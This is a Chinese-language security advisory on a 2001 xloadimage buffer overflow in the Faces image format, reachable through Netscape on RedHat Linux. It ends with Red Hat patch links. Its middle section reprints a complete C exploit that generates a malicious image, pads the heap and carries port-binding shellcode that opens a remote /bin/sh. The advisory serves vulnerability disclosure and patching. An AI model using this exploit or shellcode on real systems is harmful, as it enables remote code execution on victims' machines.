首页 -> 安全研究
安全研究
安全漏洞
xloadimage 缓冲区溢出漏洞
发布日期:2001-07-11
更新日期:2001-07-17
受影响系统:
描述:
xloadimage xloadimage 4.1
- RedHat Linux 6.2
- RedHat Linux 7.0
- RedHat Linux 7.1
BUGTRAQ ID: 3006
CVE(CAN) ID: CAN-2001-0775
xloadimage是一个可显示多种格式图片的工具。
它在处理'Faces Project'图片格式时存在一个缓冲区溢出问题。
通常这不会有什么安全问题,但是由于RedHat 所带的Netscape使用它作为插件来浏览某
些格式的图片。
因此,远程攻击者可以在自己控制的web服务器上放置一个恶意文件,当用户使用Netscape
浏览此站点时,xloadimage就可能被调用,攻击者可以以该用户身份在用户主机上执行
任意代码。
<*来源:Zenith Parsec (zen-parse@gmx.net) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Zenith Parsec (zen-parse@gmx.net)提供了如下测试代码:
//#define TARGET 0x080e1337
//as 1337 as the 1337357 kiddies.
#define TARGET 0xdeadbeef
// lamagra's port binding shell code (from bind.c in the sc.tar.gz)
//
char lamagra_bind_code[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
// slight modification so it listens on 7465 instead of 3879
// TAGS is easier to remember ;]
char *
this (int doit)
{
char *p;
int v;
p = (char *) malloc (8200);
memset (p, 0x90, 8200);
if (!doit)
for (v = 0; v < 8100; v += 122)
{
p[v] = 0xeb;
p[v + 1] = 120;
}
if (doit)
memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
p[8199] = 0;
return p;
}
main (int argc)
{
int z0, x = TARGET;
int z1, y = x;
int p;
char *q;
if (argc > 1)
printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
printf ("FirstName: %s\n", this (0));
printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
printf ("%s\n", &x);
// Begin Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
// End Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (1));
printf ("http://www.mp3.com/cosv");
printf ("\nPicData: 32 32 8\n");
printf ("\n");
for (p = 0; p < 9994; p += 1)
printf ("A");
}
// EOF -- tstot.c --
建议:
厂商补丁:
Red Hat Linux (http://www.redhat.com/support/errata/index.html)为此发布了一份安全公告 :
RHSA-2001:088-04 - xloadimage
http://www.redhat.com/support/errata/RHSA-2001-088.html
补丁下载 -
________________________________________________________________________
Red Hat Linux 6.2:
SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/xloadimage-4.1-19.6.src.rpm
alpha:
ftp://updates.redhat.com/6.2/en/os/alpha/xloadimage-4.1-19.6.alpha.rpm
i386:
ftp://updates.redhat.com/6.2/en/os/i386/xloadimage-4.1-19.6.i386.rpm
sparc:
ftp://updates.redhat.com/6.2/en/os/sparc/xloadimage-4.1-19.6.sparc.rpm
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/xloadimage-4.1-20.src.rpm
alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/xloadimage-4.1-20.alpha.rpm
i386:
ftp://updates.redhat.com/7.0/en/os/i386/xloadimage-4.1-20.i386.rpm
Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/xloadimage-4.1-20.src.rpm
alpha:
ftp://updates.redhat.com/7.1/en/os/alpha/xloadimage-4.1-20.alpha.rpm
i386:
ftp://updates.redhat.com/7.1/en/os/i386/xloadimage-4.1-20.i386.rpm
浏览次数:3887
严重程度:0(网友投票)
绿盟科技给您安全的保障